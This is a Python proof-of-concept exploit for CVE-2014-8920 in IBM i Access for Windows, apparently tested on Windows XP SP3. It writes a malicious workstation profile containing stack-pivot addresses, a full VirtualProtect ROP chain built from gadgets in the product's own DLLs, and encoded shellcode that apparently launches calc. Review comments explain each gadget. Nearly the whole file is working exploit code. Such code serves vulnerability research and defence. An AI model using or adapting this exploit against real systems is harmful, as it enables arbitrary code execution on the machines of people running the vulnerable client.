IBM i Access for Windows - CVE-2014-8920 - Exploit
import struct
# Reported by Fernando Muñoz
# Upstream: http://www-01.ibm.com/support/docview.wss?uid=nas8N1020518
# Author: Marcelo Echeverria
# Tested on Windows XP SP3
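# Stack-pivot gadget addresses.  Both sit in the same 0x67bxxxxx range as the
# LTASWN20.DLL gadgets used by the ROP chain below, so they presumably come
# from that module too (confirm).  Like every address in this file they are
# hard-coded for the build the author tested on (Windows XP SP3, see header):
# no ASLR, and they must be re-resolved for any other product/OS build.
stack_pivot1 = 0x67bc6661
stack_pivot2 = 0x67bc1967
# Original note (translated from Spanish): "jumps 3 times: pivot1 + pivot2 +
# pivot1".  The profile header emitted at the bottom of the file carries only
# pivot2 followed by pivot1; where the remaining hop comes from is not visible
# in this file.

# Unencoded WinExec("calc") shellcode: it pushes the string "calc" and walks
# the export table looking for the "WinE" prefix.  In the original script this
# was assigned to `buf` and then immediately overwritten by the encoded payload
# below, i.e. it was dead code.  It is kept under its own name purely as the
# readable reference payload; nothing below uses it.
shellcode_calc_raw = "\x31\xd2\x52\x68\x63\x61\x6c\x63\x89\xe6\x52\x56\x64\x8b\x72\x30\x8b\x76\x0c\x8b\x76\x0c\xad\x8b\x30\x8b\x7e\x18\x8b\x5f\x3c\x8b\x5c\x1f\x78\x8b\x74\x1f\x20\x01\xfe\x8b\x4c\x1f\x24\x01\xf9\x0f\xb7\x2c\x51\x42\xad\x81\x3c\x07\x57\x69\x6e\x45\x75\xf1\x8b\x74\x1f\x1c\x01\xfe\x03\x3c\xae\xff\xd7"

# Payload actually placed in the profile.  The first bytes are a self-locating
# decoder stub (sub ecx,ecx / sub ecx,-0x51 / call -1 / inc eax / pop esi /
# xor dword [esi+0xe],imm32 ...), which is what a call4_dword_xor-style encoder
# emits; the decoded payload is not recoverable by inspection here and is
# presumably the same calc launcher (TODO confirm before reuse).
# NOTE(review): the bytes contain no 0x0a, which matters because the script
# writes them through text-mode stdout (see the print section at the bottom).
buf = ""
buf += "\x29\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81"
buf += "\x76\x0e\xa0\xa9\x85\xb6\x83\xee\xfc\xe2\xf4\x5c\x41"
buf += "\x07\xb6\xa0\xa9\xe5\x3f\x45\x98\x45\xd2\x2b\xf9\xb5"
buf += "\x3d\xf2\xa5\x0e\xe4\xb4\x22\xf7\x9e\xaf\x1e\xcf\x90"
buf += "\x91\x56\x29\x8a\xc1\xd5\x87\x9a\x80\x68\x4a\xbb\xa1"
buf += "\x6e\x67\x44\xf2\xfe\x0e\xe4\xb0\x22\xcf\x8a\x2b\xe5"
buf += "\x94\xce\x43\xe1\x84\x67\xf1\x22\xdc\x96\xa1\x7a\x0e"
buf += "\xff\xb8\x4a\xbf\xff\x2b\x9d\x0e\xb7\x76\x98\x7a\x1a"
buf += "\x61\x66\x88\xb7\x67\x91\x65\xc3\x56\xaa\xf8\x4e\x9b"
buf += "\xd4\xa1\xc3\x44\xf1\x0e\xee\x84\xa8\x56\xd0\x2b\xa5"
buf += "\xce\x3d\xf8\xb5\x84\x65\x2b\xad\x0e\xb7\x70\x20\xc1"
buf += "\x92\x84\xf2\xde\xd7\xf9\xf3\xd4\x49\x40\xf6\xda\xec"
buf += "\x2b\xbb\x6e\x3b\xfd\xc1\xb6\x84\xa0\xa9\xed\xc1\xd3"
buf += "\x9b\xda\xe2\xc8\xe5\xf2\x90\xa7\x56\x50\x0e\x30\xa8"
buf += "\x85\xb6\x89\x6d\xd1\xe6\xc8\x80\x05\xdd\xa0\x56\x50"
buf += "\xe6\xf0\xf9\xd5\xf6\xf0\xe9\xd5\xde\x4a\xa6\x5a\x56"
buf += "\x5f\x7c\x12\xdc\xa5\xc1\x45\x1e\xaa\x3d\xed\xb4\xa0"
buf += "\xb8\xd9\x3f\x46\xc3\x95\xe0\xf7\xc1\x1c\x13\xd4\xc8"
buf += "\x7a\x63\x25\x69\xf1\xba\x5f\xe7\x8d\xc3\x4c\xc1\x75"
buf += "\x03\x02\xff\x7a\x63\xc8\xca\xe8\xd2\xa0\x20\x66\xe1"
buf += "\xf7\xfe\xb4\x40\xca\xbb\xdc\xe0\x42\x54\xe3\x71\xe4"
buf += "\x8d\xb9\xb7\xa1\x24\xc1\x92\xb0\x6f\x85\xf2\xf4\xf9"
buf += "\xd3\xe0\xf6\xef\xd3\xf8\xf6\xff\xd6\xe0\xc8\xd0\x49"
buf += "\x89\x26\x56\x50\x3f\x40\xe7\xd3\xf0\x5f\x99\xed\xbe"
buf += "\x27\xb4\xe5\x49\x75\x12\x75\x03\x02\xff\xed\x10\x35"
buf += "\x14\x18\x49\x75\x95\x83\xca\xaa\x29\x7e\x56\xd5\xac"
buf += "\x3e\xf1\xb3\xdb\xea\xdc\xa0\xfa\x7a\x63"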
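def create_rop_chain():
    """Build the VirtualProtect ROP chain as a packed little-endian string.

    The chain uses the usual PUSHAD layout: each register is loaded with one
    VirtualProtect argument (or a helper address), then ``PUSHAD # RETN``
    turns the register file into the call frame on the stack.  Instead of a
    hard-coded kernel32 address, VirtualProtect is located by reading the
    WaitForMultipleObjects pointer out of pcsws.exe's import table and adding
    a fixed delta, which only holds for the kernel32 build the author tested
    (Windows XP SP3, see the file header).

    Every address below is module-specific (pcsws.exe, LTASWN20.DLL,
    PCSTLNET.dll, PCSHELP.dll, PCSSH.dll, PCSWSAPI.dll, PCSULIB.dll) and must
    be re-resolved for any other product build.

    Returns:
        str on Python 2 / bytes on Python 3: the gadget addresses and
        constants packed as consecutive 32-bit little-endian words, in
        execution order.
    """
    rop_gadgets = [
        # --- resolve VirtualProtect from the pcsws.exe IAT ---
        0x0041c76d,  # POP EAX # RETN                      [pcsws.exe]
        0x004C11B4,  # -> EAX: IAT slot of WaitForMultipleObjects (per author)
        0x67b95848,  # MOV EAX,DWORD PTR DS:[EAX] # RETN   [LTASWN20.DLL]
                     #   EAX = &WaitForMultipleObjects
        0x67b9b002,  # POP ESI # RETN
        0x0000013f,  # -> ESI: delta from WaitForMultipleObjects to
                     #   VirtualProtect.  NOTE(review): kernel32-build-specific;
                     #   re-measure on any other OS build.
        0x66fc4dfb,  # ADD EAX,ESI # POP ESI # POP EBP # RETN
                     #   EAX = VirtualProtect (presumably; see 0x13f above)
        0x41414141,  # ESI pad (consumed by the POP ESI above)
        0x41414141,  # EBP pad (consumed by the POP EBP above)
        0x66eece8c,  # XCHG EAX,ESI # RETN                 [PCSTLNET.dll]
                     #   ESI = VirtualProtect, EAX = 0x41414141 pad
        # --- load the remaining PUSHAD slots ---
        0x004b5817,  # POP EBP # RETN                      [pcsws.exe]
        0x67392433,  # -> EBP: "call esp"                  [PCSHELP.dll]
                     #   becomes VirtualProtect's return address, so execution
                     #   lands on the stack right after the pushed arguments
        0x67bd8003,  # POP EBX # RETN                      [LTASWN20.DLL]
        0x00000201,  # -> EBX: dwSize
        0x00489a33,  # POP EDX # DEC ESI # ADD AL,CH # RETN [pcsws.exe]
                     #   NOTE(review): this gadget has side effects.  DEC ESI
                     #   decrements the VirtualProtect pointer loaded above, so
                     #   the 0x13f delta presumably already includes a +1 to
                     #   compensate (i.e. the true export distance is 0x13e) --
                     #   verify before porting.  ADD AL,CH only touches EAX,
                     #   which is reloaded further down, so it is harmless.
        0x00000040,  # -> EDX: flNewProtect = 0x40 (PAGE_EXECUTE_READWRITE)
        0x67963018,  # POP ECX # RETN                      [PCSSH.dll]
        0x66d2651d,  # -> ECX: writable address for lpflOldProtect [PCSWSAPI.dll]
        0x66eecfb9,  # POP EDI # RETN                      [PCSTLNET.dll]
        0x66e79118,  # -> EDI: RETN (ROP NOP)              [PCSULIB.dll]
                     #   first value popped after PUSHAD
        0x0041c76d,  # POP EAX # RETN                      [pcsws.exe]
        0x90909090,  # -> EAX: NOPs; executed after "call esp", then control
                     #   runs on into the sled/stub that follows the chain
        0x67bb99b2,  # PUSHAD # RETN                       [LTASWN20.DLL]
    ]
    # b''.join works on both Python 2 (b'' is str there) and Python 3;
    # ''.join would raise TypeError on Python 3 because struct.pack returns
    # bytes, so the original form was Python-2-only.
    return b''.join(struct.pack('<I', gadget) for gadget in rop_gadgets)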
rop_chain = create_rop_chain()
adjust_stack = "\x81\xc4\x00\x40\x00\x00\x89\xe5\x81\xc5\x00\x40\x00\x00\x66\x83\xe4\xf8\x66\x83\xe5\xf8"
# Emit the crafted profile on stdout as INI-style text ("[Profile]" /
# "ID=WS" / "Version=1"); redirect it to a file to hand to the client.  The two
# bracketed section headers carry the payload: the first holds the stack-pivot
# addresses, the second the ROP chain, a NOP gap, the stack-adjustment stub and
# the shellcode.
#
# NOTE(review): this must run under Python 2 -- the payload literals are byte
# strings only there (under Python 3 `"[" + struct.pack(...)` raises
# TypeError).  Output goes through text-mode stdout, so on Windows any 0x0a
# byte in a payload would be rewritten as 0d 0a; none is present today, but
# re-check after changing the shellcode or gadget addresses.  The second
# header is left without a closing "]" exactly as in the original PoC.
pivot_header = (
    "["
    + struct.pack('<I', stack_pivot2)
    + "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    + struct.pack('<I', stack_pivot1)
    + "]"
)
payload_header = (
    "["
    + "M" * 35
    + rop_chain
    + "\x90" * 8
    + adjust_stack
    + "\x90" * 2
    + buf
    + "\x90" * 10
)
profile_lines = [
    "[Profile]",
    "ID=WS",
    "Version=1",
    pivot_header,
    "a=1",
    payload_header,
    "a=1",
]
# Single-argument print(...) parses and behaves the same on Python 2 and 3.
for line in profile_lines:
    print(line)